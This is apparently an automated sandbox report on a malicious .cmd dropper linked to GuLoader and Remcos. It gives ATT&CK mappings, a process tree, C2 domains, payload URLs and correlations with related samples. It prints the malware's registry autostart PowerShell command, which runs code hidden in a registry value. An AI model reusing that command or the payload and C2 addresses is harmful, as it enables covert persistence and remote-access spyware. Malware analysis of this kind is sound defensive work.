              MITRE ATT&CK Matrix, listed per tactic column (the number in parentheses is the count shown in the matrix cell for that technique; techniques without a number carry no count in the matrix):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
              Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (11); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers
              Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
              Privilege Escalation: Process Injection (112); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
              Defense Evasion: Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (61); Process Injection (112); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1)
              Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
              Discovery: Security Software Discovery (21); Process Discovery (2); Virtualization/Sandbox Evasion (61); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (22); Remote System Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
              Collection: Input Capture (11); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
              Command and Control: Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (24); Multiband Communication; Commonly Used Port
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph (ID: 1435423; Sample: Teklif talebi BAKVENTA-BAKU...; Startdate: 02/05/2024; Architecture: WINDOWS; Score: 100), rendered as a process tree with the graph's DNS/IP, dropped-file and signature annotations:

              Start
                Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
                DNS/IP: jgbours284hawara02.duckdns.org; jgbours284hawara01.duckdns.org (Uses dynamic DNS services); 3 other IPs or domains
                cmd.exe
                  Signatures: Suspicious powershell command line found; Very long command line found
                  powershell.exe
                    DNS/IP: 87.121.105.163, 49730, 49749, 80 NET1-ASBG Bulgaria
                    Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                    powershell.exe
                      Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                      wab.exe
                        DNS/IP: jgbours284hawara01.duckdns.org 192.169.69.26, 3050, 3051, 49751 WOWUS United States; jgbours284hawara02.duckdns.org 45.88.90.110, 3050, 49753 LVLT-10753US Bulgaria; 2 other IPs or domains
                        Dropped: C:\Users\user\AppData\Roaming\mvourhjs.dat, data
                        Signatures: Installs a global keyboard hook
                        cmd.exe
                          conhost.exe
                          reg.exe
                      cmd.exe
                    conhost.exe
                    cmd.exe
                  conhost.exe
                chrome.exe
                  DNS/IP: 192.168.2.22 unknown unknown; 192.168.2.4, 138, 3050, 3051 unknown unknown; 239.255.255.250 unknown Reserved
                  chrome.exe
                    DNS/IP: www.google.com 142.250.80.68, 443, 49731, 49755 GOOGLEUS United States; google.com
                svchost.exe
                  DNS/IP: 127.0.0.1 unknown unknown
                chrome.exe
                  chrome.exe

              Source | Detection | Scanner | Label
              Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | 3% | ReversingLabs |
              Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | 10% | Virustotal |
              No Antivirus matches
              Source | Detection | Scanner | Label
              jgbours284hawara01.duckdns.org | 15% | Virustotal |
              geoplugin.net | 4% | Virustotal |
              duelvalenza.it | 4% | Virustotal |
              jgbours284hawara02.duckdns.org | 1% | Virustotal |
              www.duelvalenza.it | 5% | Virustotal |
              Source | Detection | Scanner | Label
              http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
              https://go.micro | 0% | URL Reputation | safe
              https://contoso.com/License | 0% | URL Reputation | safe
              https://contoso.com/Icon | 0% | URL Reputation | safe
              http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
              https://contoso.com/ | 0% | URL Reputation | safe
              http://geoplugin.net/json.gpg | 0% | Avira URL Cloud | safe
              jgbours284hawara01.duckdns.org | 100% | Avira URL Cloud | malware
              http://87.121.105.163/Terminaljob.tocXRul | 0% | Avira URL Cloud | safe
              http://www.duelvalenza.it/ | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJ | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp0 | 0% | Avira URL Cloud | safe
              http://geoplugin.net/k | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gpl | 0% | Virustotal |
              http://www.duelvalenza.it/ | 5% | Virustotal |
              http://geoplugin.net/json.gpg | 0% | Virustotal |
              http://geoplugin.net/json.gp4 | 0% | Avira URL Cloud | safe
              http://87.121.105.163 | 0% | Avira URL Cloud | safe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.bin | 0% | Avira URL Cloud | safe
              http://geoplugin.net/k | 0% | Virustotal |
              http://geoplugin.net/json.gp0 | 0% | Virustotal |
              http://crl.ver) | 0% | Avira URL Cloud | safe
              jgbours284hawara01.duckdns.org | 15% | Virustotal |
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/ | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp7 | 0% | Avira URL Cloud | safe
              http://www.duelvalenza.it/eU | 0% | Avira URL Cloud | safe
              http://87.121.105.163 | 22% | Virustotal |
              http://www.duelvalenza.it/nkF | 0% | Avira URL Cloud | safe
              http://crl.microW | 0% | Avira URL Cloud | safe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.bin | 4% | Virustotal |
              http://geoplugin.net/json.gp4 | 0% | Virustotal |
              https://duelvalenza.it/ | 0% | Avira URL Cloud | safe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/ | 7% | Virustotal |
              http://87.121.105.163/wnnSAFMWPwDXGy95.bin | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp7 | 0% | Virustotal |
              http://geoplugin.net/json.gpH= | 0% | Avira URL Cloud | safe
              http://87.121.105.163/Terminaljob.tocP | 0% | Avira URL Cloud | safe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin3 | 0% | Avira URL Cloud | safe
              https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.bin | 0% | Avira URL Cloud | safe
              https://duelvalenza.it/ | 3% | Virustotal |
              http://87.121.105.163/Terminaljob.toc | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gpH= | 4% | Virustotal |
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binM | 0% | Avira URL Cloud | safe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp938= | 0% | Avira URL Cloud | safe
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binI | 0% | Avira URL Cloud | safe
              http://87.121.H | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              jgbours284hawara01.duckdns.org | 192.169.69.26 | true | true | - | unknown
              google.com | 142.251.41.78 | true | false | - | high
              geoplugin.net | 178.237.33.50 | true | false | - | unknown
              www.google.com | 142.250.80.68 | true | false | - | high
              duelvalenza.it | 46.254.34.12 | true | false | - | unknown
              jgbours284hawara02.duckdns.org | 45.88.90.110 | true | true | - | unknown
              www.duelvalenza.it | unknown | unknown | true | - | unknown
              Name | Malicious | Antivirus Detection | Reputation
              jgbours284hawara01.duckdns.org | true | 15%, Virustotal; Avira URL Cloud: malware | unknown
              https://duelvalenza.it/wnnSAFMWPwDXGy95.bin | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/ | false | 7%, Virustotal; Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
              http://87.121.105.163/wnnSAFMWPwDXGy95.bin | false | Avira URL Cloud: safe | unknown
              http://87.121.105.163/Terminaljob.toc | false | Avira URL Cloud: safe | unknown
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin | false | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://geoplugin.net/json.gpg | wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
              http://87.121.105.163/Terminaljob.tocXRul | powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gpl | wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp | false | - | high
              http://www.duelvalenza.it/ | wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmp | false | 5%, Virustotal; Avira URL Cloud: safe | unknown
              https://go.micro | powershell.exe, 00000002.00000002.2384493968.00000210AE111000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJ | wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp0 | wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              https://contoso.com/License | powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://geoplugin.net/k | wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              https://contoso.com/Icon | powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://geoplugin.net/json.gp4 | wab.exe, 0000000F.00000002.2885259023.00000000059DE000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://87.121.105.163 | powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2384493968.00000210AD0A6000.00000004.00000800.00020000.00000000.sdmp | false | 22%, Virustotal; Avira URL Cloud: safe | unknown
              http://crl.ver) | svchost.exe, 00000008.00000002.2883770137.000002087C800000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
              https://g.live.com/odclientsettings/ProdV2.C: | edb.log.8.dr | false | - | high
              http://geoplugin.net/json.gp7 | wab.exe, 0000000F.00000003.2318747084.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://www.duelvalenza.it/eU | wab.exe, 0000000F.00000003.2220389190.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.duelvalenza.it/nkF | wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://crl.microW | powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmp | false | - | high
              https://duelvalenza.it/ | wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
              https://g.live.com/odclientsettings/Prod.C: | edb.log.8.dr | false | - | high
              https://g.live.com/odclientsettings/ProdV2 | edb.log.8.dr | false | - | high
              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr | false | - | high
              https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://geoplugin.net/json.gpH= | wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
              http://87.121.105.163/Terminaljob.tocP | powershell.exe, 00000002.00000002.2384493968.00000210ACEBD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://contoso.com/ | powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin3 | wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.bin | wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binM | wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://geoplugin.net/json.gp938= | wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
              http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binI | wab.exe, 0000000F.00000003.2208059166.0000000005A0C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://87.121.H | powershell.exe, 00000002.00000002.2384493968.00000210AECAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr | false | - | high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
              IP | Domain | Country | ASN | ASN Name | Malicious
              142.250.80.68 | www.google.com | United States | 15169 | GOOGLEUS | false
              45.88.90.110 | jgbours284hawara02.duckdns.org | Bulgaria | 10753 | LVLT-10753US | true
              46.254.34.12 | duelvalenza.it | Italy | 52030 | SERVERPLAN-ASIT | false
              239.255.255.250 | unknown | Reserved | unknown | unknown | false
              87.121.105.163 | unknown | Bulgaria | 43561 | NET1-ASBG | false
              178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
              192.169.69.26 | jgbours284hawara01.duckdns.org | United States | 23033 | WOWUS | true
                                          IP
                                          192.168.2.4
                                          192.168.2.22
                                          127.0.0.1
              Joe Sandbox version: 40.0.0 Tourmaline
              Analysis ID: 1435423
              Start date and time: 2024-05-02 17:20:08 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 6m 41s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed: 20
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
              Detection: MAL
              Classification: mal100.troj.spyw.evad.winCMD@43/15@11/10
                                          EGA Information:
                                          • Successful, ratio: 33.3%
                                          HCA Information:
                                          • Successful, ratio: 68%
                                          • Number of executed functions: 27
                                          • Number of non-executed functions: 24
                                          Cookbook Comments:
                                          • Found application associated with file extension: .cmd
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.251.40.238, 172.253.115.84, 142.251.40.227, 34.104.35.123, 23.33.40.25, 192.229.211.108, 23.199.50.2, 23.51.58.94, 142.250.65.163, 142.251.40.206
                                          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                          • Execution Graph export aborted for target powershell.exe, PID 7504 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes were analyzed; the report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
              Time | Type | Description
              16:21:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Stagenes %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)
              16:22:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Stagenes %Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)
              17:20:55 | API Interceptor | 94x Sleep call for process: powershell.exe modified
              17:21:14 | API Interceptor | 2x Sleep call for process: svchost.exe modified
              17:21:53 | API Interceptor | 73x Sleep call for process: wab.exe modified
IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context

239.255.255.250
  SAL_000268_DOM.xls | malicious | Unknown | -
  http://cuts.kr/APFXM | malicious | Unknown | -
  5801.xls | malicious | Unknown | -
  https://gamma.app/docs/Untitled-9umekc4egyknsob | malicious | HTMLPhisher | -
  https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613 | malicious | HtmlDropper, HTMLPhisher | -
  9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | malicious | HTMLPhisher | -
  http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | -
  (same URL, three further analyses) | malicious | Unknown | -

87.121.105.163
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
  doc.bat | malicious | GuLoader, Remcos | 87.121.105.163/Sylvester.dwp
  PO_La-Tannerie04180240418.bat | malicious | FormBook, GuLoader | 87.121.105.163/tWVvmOpHE254.bin
  LUMEN3547583853959599359959359Cercospora.bat | malicious | GuLoader, Remcos | 87.121.105.163/tossers.psp
  rCW_00402902400429.bat | malicious | FormBook, GuLoader | 87.121.105.163/Aviarists.aca
  CDS AC 661171855-VN1 SOA.wsf | malicious | FormBook, GuLoader | 87.121.105.163/AKaUDBTG140.bin
  DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | 87.121.105.163/PUzAKuQ35.bin
  PO_La-Tanerie04180240124.vbs | malicious | GuLoader, Remcos | 87.121.105.163/YSnpkrCwWalJFSpN146.bin
  FTG_PD_04024024001.vbs | malicious | FormBook, GuLoader | 87.121.105.163/EYioOXUtWs45.bin
  Doc_004024024001.bat | malicious | FormBook, GuLoader | 87.121.105.163/TjtonPwEiP175.bin

45.88.90.110
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | -
  doc.bat | malicious | GuLoader, Remcos | -
  DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | -
  BRUFEN ORDER VAC442_7467247728478134247.vbs | malicious | GuLoader, Remcos | -
  HTMCDevalueringstidspunkts2024.vbs | malicious | GuLoader, Remcos | -
  rOferta_SKGNMECLemnedefinitionen353523577.wsf | malicious | GuLoader, Remcos | -
  PonudaSKMTBH365756867868855766786686.vbs | malicious | GuLoader, Remcos | -

46.254.34.12
  doc.bat | malicious | GuLoader, Remcos | www.duelvalenza.it/fnuRRYIa56.bin
  LUMEN3547583853959599359959359Cercospora.bat | malicious | GuLoader, Remcos | www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
  DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | www.duelvalenza.it/FIPWKWOaFXJGe178.bin
Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)

google.com
  SAL_000268_DOM.xls | malicious | Unknown | 172.217.1.4
  01105751.vbs | malicious | FormBook, GuLoader | 142.251.40.206
  DHL0000879654982647865424.vbs | malicious | Unknown | 142.250.81.225
  http://cuts.kr/APFXM | malicious | Unknown | 142.251.40.228
  5801.xls | malicious | Unknown | 172.217.1.4
  https://gamma.app/docs/Untitled-9umekc4egyknsob | malicious | HTMLPhisher | 142.250.80.100
  https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613 | malicious | HtmlDropper, HTMLPhisher | 142.250.81.228
  9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | malicious | HTMLPhisher | 142.250.65.164
  http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 142.250.80.68
  http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 142.251.40.228

jgbours284hawara01.duckdns.org
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 192.169.69.26
  LUMEN3547583853959599359959359Cercospora.bat | malicious | GuLoader, Remcos | 192.169.69.26
  DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | 45.88.90.110
  BRUFEN ORDER VAC442_7467247728478134247.vbs | malicious | GuLoader, Remcos | 45.88.90.110
  HTMCDevalueringstidspunkts2024.vbs | malicious | GuLoader, Remcos | 45.88.90.110
  rOferta_SKGNMECLemnedefinitionen353523577.wsf | malicious | GuLoader, Remcos | 45.88.90.110
  PonudaSKMTBH365756867868855766786686.vbs | malicious | GuLoader, Remcos | 45.88.90.110

jgbours284hawara02.duckdns.org
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 45.88.90.110
  doc.bat | malicious | GuLoader, Remcos | 45.88.90.110

geoplugin.net
  GVV.exe | malicious | Remcos | 178.237.33.50
  INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
  Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
  202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 178.237.33.50
  nU7Z8sPyvf.rtf | malicious | Remcos | 178.237.33.50
  Tapril-30-receipt.vbs | malicious | Remcos | 178.237.33.50
  Tapril-30-receipt.vbs (second analysis) | malicious | Remcos | 178.237.33.50
  bYPQHxUNMF.exe | malicious | Remcos | 178.237.33.50
  doc.bat | malicious | GuLoader, Remcos | 178.237.33.50
ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)

SERVERPLAN-ASIT
  doc.bat | malicious | GuLoader, Remcos | 46.254.34.12
  LUMEN3547583853959599359959359Cercospora.bat | malicious | GuLoader, Remcos | 46.254.34.12
  https://colmec.it/category/news | malicious | Unknown | 46.254.38.218
  DHL_ES567436735845755676678877988975877.vbs | malicious | FormBook, GuLoader, Remcos | 46.254.34.12
  https://colmec.it/category/news | malicious | Unknown | 46.254.38.218
  https://colmec.it/category/news | malicious | Unknown | 46.254.38.218
  iOsHTdcOUN.elf | malicious | Mirai | 46.30.243.116
  huhu.mips.elf | malicious | Mirai, Okiru | 46.30.243.112
  https://secosrl.com/.well-known/pki-validation/Auths/5155027697.html | malicious | HTMLPhisher | 185.81.4.196
  BRvptajioG.exe | malicious | RedLine, SmokeLoader, Stealc | 46.254.37.204

NET1-ASBG
  01105751.vbs | malicious | FormBook, GuLoader | 87.121.105.54
  Aqua.x86-20240502-1008.elf | malicious | Unknown | 94.156.79.215
  Aqua.arm7-20240502-1008.elf | malicious | Mirai | 94.156.79.215
  yibSQnyAI7.elf | malicious | Mirai, Okiru | 93.123.85.46
  ryOgrdefvB.elf | malicious | Mirai, Okiru | 93.123.85.46
  kdTZ0vraR2.elf | malicious | Mirai, Okiru | 93.123.85.46
  jj5TL5MXzK.elf | malicious | Mirai, Okiru | 93.123.85.46
  file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 94.156.79.214
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 87.121.105.163
  831107010C8578AD95A12C5498B03755EAC398B5BBC0D.exe | malicious | RisePro Stealer | 94.156.8.188

LVLT-10753US
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 45.88.90.110
  doc.bat | malicious | GuLoader, Remcos | 45.88.90.110
  957URl9ErB.exe | malicious | Socks5Systemz | 45.88.90.160
  57O67GbOCj.elf | malicious | Mirai | 94.154.174.111
  x1b5bmJgLm.elf | malicious | Unknown | 153.13.37.94
  fbW42zYly3.elf | malicious | Mirai | 206.165.107.221
  NBcTP7MyXM.elf | malicious | Gafgyt, Mirai | 45.88.90.17
  SBZG0flucJ.elf | malicious | Gafgyt, Mirai | 45.88.90.17
  Sl8HmMfNnr.elf | malicious | Gafgyt, Mirai | 45.88.90.17
  50eBWGCFKc.elf | malicious | Gafgyt, Mirai | 45.88.90.17

ATOM86-ASATOM86NL
  GVV.exe | malicious | Remcos | 178.237.33.50
